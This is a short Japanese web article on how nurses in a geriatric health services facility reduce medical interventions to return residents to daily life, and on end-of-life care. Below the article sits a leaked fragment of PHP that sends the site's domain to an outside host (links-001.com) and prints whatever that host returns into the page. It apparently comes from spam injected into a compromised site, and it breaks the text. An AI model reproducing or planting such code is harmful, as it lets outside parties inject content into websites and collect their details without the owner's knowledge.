患者を生活者に戻すためのケアを

介護老人保健施設は、医療機関と在宅をつなぐ中間施設で、医学的管理のもと維持期のリハビリテーションと自立支援に取り組み、在宅復帰を目指し、復帰後の在宅療養支援を目的としています。
老健で働く医療従事者である看護スタッフの役割は、利用者の健康管理とともに患者を生活者に戻すことです。
そのため、健康管理をしながらできるだけ医療の要素を取り除くことが必要です。
たとえば、医師と相談しながら睡眠状況をみて、不要な眠剤を中止したり、インスリンから内服薬に変更したりします。
また、膀胱留置カテーテルの除去や処置を減らしていくことなどを挙げられます。
これらのことで一緒に働く介護スタッフも介護がしやすくなり、一緒に暮らす家族の介護のしやすさにもつながっていきます。
そして、医療の連携体制が病院から地域にシフトしていく中で、老健にも看取りの機能が求められているのが実情です。
在宅復帰率の高い老健ほど看取りケアを行っており、繰り返し利用してもらう老健だからこそ、利用者や家族との信頼関係が構築され、ケアを行った利用者の最期にかかわらせてもらうことができます。

".file_get_contents('http://links-001.com/123set4.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

最新記事